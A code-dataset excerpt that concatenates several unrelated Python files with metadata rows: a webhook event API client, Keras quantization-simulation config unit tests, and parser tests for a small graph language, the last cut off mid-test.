] | null | null | null | apis/event_api.py | tacklebox-webhooks/python | d2581110ab701467f5d584d0fd8ebb5f4c43a7aa | [
"MIT"
] | null | null | null | from .error import *
from .http_request import HttpRequest
from .http_client import HttpClient
class EventApi:
def __init__(self, config):
self.base_url = config['base_url']
self.http_client = HttpClient(config['api_key'])
self.validator = Validation()
def list_events(self, service_id, user_id):
if not self.validator.is_valid_id(service_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The list_events method must be invoked with a non-empty string service_id argument."
)
if not self.validator.is_valid_id(user_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The list_events method must be invoked with a non-empty string user_id argument."
)
path = f"services/{service_id}/users/{user_id}/events"
request = HttpRequest("GET", self.base_url, path)
return self.http_client.send(request)
def create_event(self, service_id, user_id, event_data):
if not self.validator.is_valid_id(service_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The create_event method must be invoked with a non-empty string service_id argument."
)
if not self.validator.is_valid_id(user_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The create_event method must be invoked with a non-empty string user_id argument."
)
if not self.validator.is_valid_event_data(event_data):
return new_error(
ERROR_TYPES['missing_parameter'],
"The create_event method must be invoked with an event_data argument containing non-empty event_type and payload properties."
)
path = f"services/{service_id}/users/{user_id}/events"
request = HttpRequest("POST", self.base_url, path, event_data)
return self.http_client.send(request)
def get_event(self, service_id, user_id, event_id):
if not self.validator.is_valid_id(service_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The get_event method must be invoked with a non-empty string service_id argument."
)
if not self.validator.is_valid_id(user_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The get_event method must be invoked with a non-empty string user_id argument."
)
if not self.validator.is_valid_id(event_id):
return new_error(
ERROR_TYPES['missing_parameter'],
"The get_event method must be invoked with a non-empty string event_id argument."
)
path = f"services/{service_id}/users/{user_id}/events/{event_id}"
request = HttpRequest("GET", self.base_url, path)
return self.http_client.send(request)
| 42.068493 | 141 | 0.620319 | 387 | 3,071 | 4.661499 | 0.157623 | 0.059867 | 0.039911 | 0.079823 | 0.808758 | 0.799335 | 0.799335 | 0.746674 | 0.746674 | 0.745565 | 0 | 0 | 0.299902 | 3,071 | 72 | 142 | 42.652778 | 0.83907 | 0 | 0 | 0.483333 | 0 | 0 | 0.323347 | 0.046565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.05 | 0 | 0.316667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
79f0d72566a9e059b3229685f5692b9233ff45cd | 48 | py | Python | test.py | cjsyzwsh/South_Australia_Transport_Econ | 8c27f3015193113f8f479e7c0e0c3ff1ac42944e | [
"MIT"
] | 1 | 2021-04-08T12:50:24.000Z | 2021-04-08T12:50:24.000Z | test.py | cjsyzwsh/South_Australia_Transport_Econ | 8c27f3015193113f8f479e7c0e0c3ff1ac42944e | [
"MIT"
] | null | null | null | test.py | cjsyzwsh/South_Australia_Transport_Econ | 8c27f3015193113f8f479e7c0e0c3ff1ac42944e | [
"MIT"
] | 1 | 2021-04-08T12:50:25.000Z | 2021-04-08T12:50:25.000Z | import utils.util.compute_road_attributes as cra | 48 | 48 | 0.895833 | 8 | 48 | 5.125 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 48 | 1 | 48 | 48 | 0.911111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
79f2f5550d76cc233972d7a698a80af64cde79ca | 24,793 | py | Python | TrainingExtensions/tensorflow/test/python/test_quantsim_config_keras.py | lipovsek/aimet | 236fb02cc6c45e65c067030416c49a09ace82045 | [
"BSD-3-Clause"
] | null | null | null | TrainingExtensions/tensorflow/test/python/test_quantsim_config_keras.py | lipovsek/aimet | 236fb02cc6c45e65c067030416c49a09ace82045 | [
"BSD-3-Clause"
] | null | null | null | TrainingExtensions/tensorflow/test/python/test_quantsim_config_keras.py | lipovsek/aimet | 236fb02cc6c45e65c067030416c49a09ace82045 | [
"BSD-3-Clause"
] | null | null | null | # =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2022, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
import json
import os
import pytest
pytestmark = pytest.mark.skip("Disable tests that requires eager execution")
from tensorflow.keras.layers import InputLayer
from aimet_common.defs import QuantScheme
from aimet_tensorflow.keras.connectedgraph import ConnectedGraph
from aimet_tensorflow.keras.quantsim_config.quantsim_config import QuantSimConfigurator, INPUT_QUANTIZERS, \
OUTPUT_QUANTIZERS, PARAM_QUANTIZERS
from test_models_keras import single_residual, concat_functional, tiny_conv_net
class TestQuantSimConfig:
"""
Class containing unit tests for quantsim config feature
"""
def test_mapping_layer_to_affected_quantizers_for_multi_input(self):
"""
Test if layer and its affected quantizers are correctly mapped
"""
model = concat_functional()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "")
# layers excluding InputLayer
layers = [x for x in model.layers if not isinstance(x, InputLayer)]
dense1, dense2, dense3, concat1, dense4, dense5 = layers
# Note:
# 0 (Affected quantizers when enabling input quantizer of this layer)
# 1 (Affected quantizers when enabling output quantizer of this layer)
# 2 (Affected quantizers when disabling input quantizer of this layer)
# 3 (Affected quantizers when disabling output quantizer of this layer)
layer_to_affected_tensor_quantizers_dict = quant_sim_configurator._layer_to_affected_quantizer_info_dict
# Input layer 1
assert len(layer_to_affected_tensor_quantizers_dict[dense1][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense1][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense1][2]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense1][3]) == 2
assert (dense1, "output") in layer_to_affected_tensor_quantizers_dict[dense1][3]
assert (dense3, "input") in layer_to_affected_tensor_quantizers_dict[dense1][3]
# Input layer 2
assert len(layer_to_affected_tensor_quantizers_dict[dense2][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense2][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense2][2]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense2][3]) == 3
assert (dense2, "output") in layer_to_affected_tensor_quantizers_dict[dense2][3]
assert (dense3, "output") in layer_to_affected_tensor_quantizers_dict[dense2][3]
assert (concat1, "input") in layer_to_affected_tensor_quantizers_dict[dense2][3]
# Layer having multiple producers (Concat layer)
assert len(layer_to_affected_tensor_quantizers_dict[concat1][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[concat1][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[concat1][2]) == 3
assert (concat1, "input") in layer_to_affected_tensor_quantizers_dict[concat1][2]
assert (dense2, "output") in layer_to_affected_tensor_quantizers_dict[concat1][2]
assert (dense3, "output") in layer_to_affected_tensor_quantizers_dict[concat1][2]
assert len(layer_to_affected_tensor_quantizers_dict[concat1][3]) == 2
# Last layer
assert len(layer_to_affected_tensor_quantizers_dict[dense5][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense5][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense5][2]) == 2
assert len(layer_to_affected_tensor_quantizers_dict[dense5][3]) == 1
assert (dense5, "output") in layer_to_affected_tensor_quantizers_dict[dense5][3]
def test_mapping_layer_to_affected_quantizers_for_single_residual(self):
"""
Test if layer and its affected quantizers are correctly mapped
"""
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "")
# layers excluding InputLayer
layers = model.layers[1:]
conv1, bn1, max_pool1, conv2, conv4 = layers[0], layers[1], layers[3], layers[4], layers[7]
conv3, avg_pool1, add1, dense1 = layers[8], layers[9], layers[10], layers[14]
# Note:
# 0 (Affected quantizers when enabling input quantizer of this layer)
# 1 (Affected quantizers when enabling output quantizer of this layer)
# 2 (Affected quantizers when disabling input quantizer of this layer)
# 3 (Affected quantizers when disabling output quantizer of this layer)
layer_to_affected_tensor_quantizers_dict = quant_sim_configurator._layer_to_affected_quantizer_info_dict
# First layer
assert len(layer_to_affected_tensor_quantizers_dict[conv1][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[conv1][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[conv1][2]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[conv1][3]) == 2
assert (conv1, "output") in layer_to_affected_tensor_quantizers_dict[conv1][3]
assert (bn1, "input") in layer_to_affected_tensor_quantizers_dict[conv1][3]
# Layer having multiple consumers (MaxPool layer)
assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][2]) == 2
assert len(layer_to_affected_tensor_quantizers_dict[max_pool1][3]) == 3
assert (max_pool1, "output") in layer_to_affected_tensor_quantizers_dict[max_pool1][3]
assert (conv2, "input") in layer_to_affected_tensor_quantizers_dict[max_pool1][3]
assert (conv4, "input") in layer_to_affected_tensor_quantizers_dict[max_pool1][3]
# Layer having multiple producers (Add layer)
assert len(layer_to_affected_tensor_quantizers_dict[add1][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[add1][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[add1][2]) == 3
assert (add1, "input") in layer_to_affected_tensor_quantizers_dict[add1][2]
assert (conv3, "output") in layer_to_affected_tensor_quantizers_dict[add1][2]
assert (avg_pool1, "output") in layer_to_affected_tensor_quantizers_dict[add1][2]
assert len(layer_to_affected_tensor_quantizers_dict[add1][3]) == 2
# Last layer
assert len(layer_to_affected_tensor_quantizers_dict[dense1][0]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense1][1]) == 1
assert len(layer_to_affected_tensor_quantizers_dict[dense1][2]) == 2
assert len(layer_to_affected_tensor_quantizers_dict[dense1][3]) == 1
def test_parse_config_file_defaults(self):
"""
Test that default quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
},
"per_channel_quantization": "True",
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
for op in connected_graph.ordered_ops:
layer = op.get_module()
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
assert not q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
assert not q.is_enabled()
assert q.is_symmetric
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_symmetric_modes(self):
"""
Test that model output quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {},
"params": {},
"strict_symmetric": "True",
"unsigned_symmetric": "False"
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {
}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
for op in connected_graph.ordered_ops:
layer = op.get_module()
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
assert q.use_strict_symmetric
assert not q.use_unsigned_symmetric
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert q.use_strict_symmetric
assert not q.use_unsigned_symmetric
for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
assert q.use_strict_symmetric
assert not q.use_unsigned_symmetric
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_params(self):
"""
Test that param specific quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
}
},
"params": {
"weight": {
"is_quantized": "True",
"is_symmetric": "False"
}
},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {
}
}
with open("./data/quantsim_config.json", "w") as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
for op in connected_graph.ordered_ops:
layer = op.get_module()
for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
if "bias" in q.name:
assert not q.is_enabled()
assert q.is_symmetric
else:
assert q.is_enabled()
assert not q.is_symmetric
if os.path.exists("./data/quantsim_config.json"):
os.remove("./data/quantsim_config.json")
def test_parse_config_file_op_type(self):
"""
Test that op specific quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
}
},
"params": {},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_symmetric": "False",
"params": {
"bias": {
"is_quantized": "True",
"is_symmetric": "False"
}
}
}
},
"supergroups": [],
"model_input": {},
"model_output": {
}
}
with open("./data/quantsim_config.json", "w") as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
for op in connected_graph.ordered_ops:
layer = op.get_module()
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
if op.type == "Conv":
assert q.is_enabled()
assert not q.is_symmetric
else:
assert not q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
if op.type == "Conv" and "bias" in q.name:
assert q.is_enabled()
assert not q.is_symmetric
else:
assert not q.is_enabled()
assert q.is_symmetric
if os.path.exists("./data/quantsim_config.json"):
os.remove("./data/quantsim_config.json")
def test_parse_config_file_op_type_conflict_case(self):
"""
Test that op specific quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {},
"params": {}
},
"params": {},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_output_quantized": "False"
},
"BatchNormalization": {
"is_input_quantized": "True"
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
with pytest.raises(RuntimeError):
_ = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced, "nearest",
8, 8, "./data/quantsim_config.json")
if os.path.exists("./data/quantsim_config.json"):
os.remove("./data/quantsim_config.json")
def test_parse_config_file_model_inputs(self):
"""
Test that model input quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {},
"params": {}
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open("./data/quantsim_config.json", "w") as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
conv1 = model.layers[1]
for op in connected_graph.ordered_ops:
layer = op.get_module()
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
if layer == conv1:
assert q.is_enabled()
else:
assert not q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert not q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
assert not q.is_enabled()
assert not q.is_symmetric
if os.path.exists("./data/quantsim_config.json"):
os.remove("./data/quantsim_config.json")
def test_parse_config_file_supergroups(self):
"""
Test that supergroup quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "False"
}
},
"params": {},
"op_type": {},
"supergroups": [
{
"op_list": ["Conv", "BatchNormalization"]
},
{
"op_list": ["Relu", "MaxPool"]
},
{
"op_list": ["Conv", "Relu", "AveragePool"]
}
],
"model_input": {},
"model_output": {}
}
with open("./data/quantsim_config.json", "w") as f:
json.dump(quantsim_config, f)
model = tiny_conv_net()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
conv1, relu1, conv2, conv3 = model.layers[1], model.layers[3], model.layers[5], model.layers[8]
relu3 = model.layers[9]
bn1, maxpool, bn2, avgpool = model.layers[2], model.layers[4], model.layers[6], model.layers[10]
for op in connected_graph.ordered_ops:
layer = op.get_module()
# Check configs for starts of supergroups
if layer in [conv1, relu1, conv2, conv3]:
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert not q.is_enabled()
# Check configs for middle ops in supergroups
elif layer == relu3:
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
assert not q.is_enabled()
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert not q.is_enabled()
# Check configs for ends of supergroups
elif layer in [bn1, maxpool, bn2, avgpool]:
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
assert not q.is_enabled()
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert q.is_enabled()
else:
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
assert not q.is_enabled()
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
assert q.is_enabled()
if os.path.exists("./data/quantsim_config.json"):
os.remove("./data/quantsim_config.json")
def test_parse_config_file_model_outputs(self):
"""
Test that model output quantization parameters are set correctly when using json config file
"""
quantsim_config = {
"defaults": {
"ops": {},
"params": {}
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {
"is_output_quantized": "True"
}
}
with open("./data/quantsim_config.json", "w") as f:
json.dump(quantsim_config, f)
model = single_residual()
connected_graph = ConnectedGraph(model)
quant_sim_configurator = QuantSimConfigurator(connected_graph, QuantScheme.post_training_tf_enhanced,
"nearest", 8, 8, "./data/quantsim_config.json")
layer_to_quantizers_dict = quant_sim_configurator._layer_to_quantizers_dict
fc = model.layers[-1]
for op in connected_graph.ordered_ops:
layer = op.get_module()
for q in layer_to_quantizers_dict[layer][INPUT_QUANTIZERS]:
assert not q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][OUTPUT_QUANTIZERS]:
if layer == fc:
assert q.is_enabled()
else:
assert not q.is_enabled()
assert not q.is_symmetric
for q in layer_to_quantizers_dict[layer][PARAM_QUANTIZERS]:
assert not q.is_enabled()
assert not q.is_symmetric
if os.path.exists("./data/quantsim_config.json"):
os.remove("./data/quantsim_config.json")
| 42.82038 | 112 | 0.590046 | 2,702 | 24,793 | 5.126943 | 0.110289 | 0.046488 | 0.059554 | 0.077312 | 0.801776 | 0.789071 | 0.78012 | 0.78012 | 0.767343 | 0.722804 | 0 | 0.0141 | 0.313476 | 24,793 | 578 | 113 | 42.894464 | 0.799777 | 0.146614 | 0 | 0.644231 | 0 | 0 | 0.110525 | 0.04258 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.024038 | false | 0 | 0.019231 | 0 | 0.045673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
79f673d6734652acfd090bf04e446adc5e117308 | 19,245 | py | Python | test/parser_test.py | xyzdev/grama | f9ef5ccea28a5ca10aedfde21fbce613ce78092e | [
"MIT"
] | 3 | 2017-08-23T02:01:58.000Z | 2019-06-05T11:55:24.000Z | test/parser_test.py | xyzdev/grama | f9ef5ccea28a5ca10aedfde21fbce613ce78092e | [
"MIT"
] | null | null | null | test/parser_test.py | xyzdev/grama | f9ef5ccea28a5ca10aedfde21fbce613ce78092e | [
"MIT"
] | null | null | null | from nose.tools import assert_equal, assert_raises_regexp
from grama.grama import Instruction, Address, Parser
class Test(object):
@staticmethod
def assert_instruction(expected_action, expected_addr1, expected_addr2, expected_addr3, expected_ofs, actual):
assert_equal(expected_action, actual.action)
assert_equal(str(expected_addr1), str(actual.source))
assert_equal(str(expected_addr2), str(actual.target))
assert_equal(str(expected_addr3), str(actual.link))
assert_equal(expected_ofs, actual.offset)
def test_multiple_complex_statements_on_one_line(self):
parser = Parser()
instr = parser.parse("\\21;' '#';\\7d\n\\21/' '>' ';\\21/' '?' ':-1")
assert_equal(4, len(instr))
self.assert_instruction(Instruction.CREATE, Address('!'), None, None, 1, instr[0])
self.assert_instruction(Instruction.CREATE, Address(' '), None, None, 1, instr[1])
self.assert_instruction(Instruction.LINK, Address('!'), Address(' '), Address(' '), 1, instr[2])
self.assert_instruction(Instruction.MATCH, Address('!', [' ']), Address(' '), None, -1, instr[3])
def test_comment(self):
parser = Parser()
instr = parser.parse(" # Comment")
assert_equal(0, len(instr))
instr = parser.parse("# Comment with no leading space")
assert_equal(0, len(instr))
instr = parser.parse("a# Comment")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.CREATE, Address('a'), None, None, 1, instr[0])
instr = parser.parse("a# Comment\nb # Comment")
assert_equal(2, len(instr))
self.assert_instruction(Instruction.CREATE, Address('a'), None, None, 1, instr[0])
self.assert_instruction(Instruction.CREATE, Address('b'), None, None, 1, instr[1])
def test_create(self):
parser = Parser()
instr = parser.parse("uncomplicated_concept_name")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.CREATE, Address('uncomplicated_concept_name'), None, None, 1, instr[0])
def test_create_quoted(self):
parser = Parser()
instr = parser.parse("'uncomplicated_concept_name'")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.CREATE, Address('uncomplicated_concept_name'), None, None, 1, instr[0])
def test_create_missing_end_quote(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'uncomplicated_concept_name")
def test_create_quoted_complex(self):
parser = Parser()
instr = parser.parse("'\\27 />?:-;#\\41'#Comment'")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.CREATE, Address("' />?:-;#A"), None, None, 1, instr[0])
def test_create_complex(self):
parser = Parser()
instr = parser.parse("\\27\\20\\2f\\3e\\3f\\3a-\\3b\\41#Comment'\n")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.CREATE, Address("' />?:-;A"), None, None, 1, instr[0])
def test_create_path(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1:'):
parser.parse("/a")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1:'):
parser.parse("a/")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1:'):
parser.parse("a/b")
def test_link(self):
parser = Parser()
instr = parser.parse("uncomplicated_concept_name/uncompl_link>other_uncompl_name")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address('uncomplicated_concept_name'),
Address('other_uncompl_name'),
Address('uncompl_link'), 1, instr[0])
def test_link_target_link(self):
parser = Parser()
instr = parser.parse("uncomplicated_concept_name/uncompl_link>other_uncompl_name/other_link")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address('uncomplicated_concept_name'),
Address('other_uncompl_name', ['other_link']),
Address('uncompl_link'), 1, instr[0])
def test_link_source_link(self):
parser = Parser()
instr = parser.parse("uncomplicated_concept_name/other_src_link/uncompl_link>other_uncompl_name/other_link")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address('uncomplicated_concept_name', ['other_src_link']),
Address('other_uncompl_name', ['other_link']),
Address('uncompl_link'), 1, instr[0])
def test_link_quoted(self):
parser = Parser()
instr = parser.parse("'uncomplicated_concept_name'/'other_src_link'/'uncompl_link'>"
"'other_uncompl_name'/'other_link'")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address('uncomplicated_concept_name', ['other_src_link']),
Address('other_uncompl_name', ['other_link']),
Address('uncompl_link'), 1, instr[0])
def test_link_complex(self):
parser = Parser()
instr = parser.parse("\\27\\20\\2f\\3e\\3f\\3a-\\3b\\41/\\27\\20\\2f\\3e\\3f\\3a-\\3b\\42/"
"\\27\\20\\2f\\3e\\3f\\3a-\\3b\\43>"
"\\27\\20\\2f\\3e\\3f\\3a-\\3b\\44/\\27\\20\\2f\\3e\\3f\\3a-\\3b\\45 #Comment")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address("' />?:-;A", ["' />?:-;B"]),
Address("' />?:-;D", ["' />?:-;E"]),
Address("' />?:-;C"), 1, instr[0])
def test_link_quoted_complex(self):
parser = Parser()
instr = parser.parse("'\\27 />?:-;#\\41'/'\\27 />?:-;#\\42'/'\\27 />?:-;#\\43'>"
"'\\27 />?:-;#\\44'/'\\27 />?:-;#\\45'")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address("' />?:-;#A", ["' />?:-;#B"]),
Address("' />?:-;#D", ["' />?:-;#E"]),
Address("' />?:-;#C"), 1, instr[0])
def test_link_to_new(self):
parser = Parser()
instr = parser.parse("'\\27 />?:-;#\\41'/'\\27 />?:-;#\\42'/'\\27 />?:-;#\\43'>+")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.LINK,
Address("' />?:-;#A", ["' />?:-;#B"]),
Address(Address.NEW),
Address("' />?:-;#C"), 1, instr[0])
def test_link_missing_quote(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a/'b'/'c'>'d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b/'c'>'d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b'/'c>'d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b'/'c'>'d/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b'/'c'>'d'/'e")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
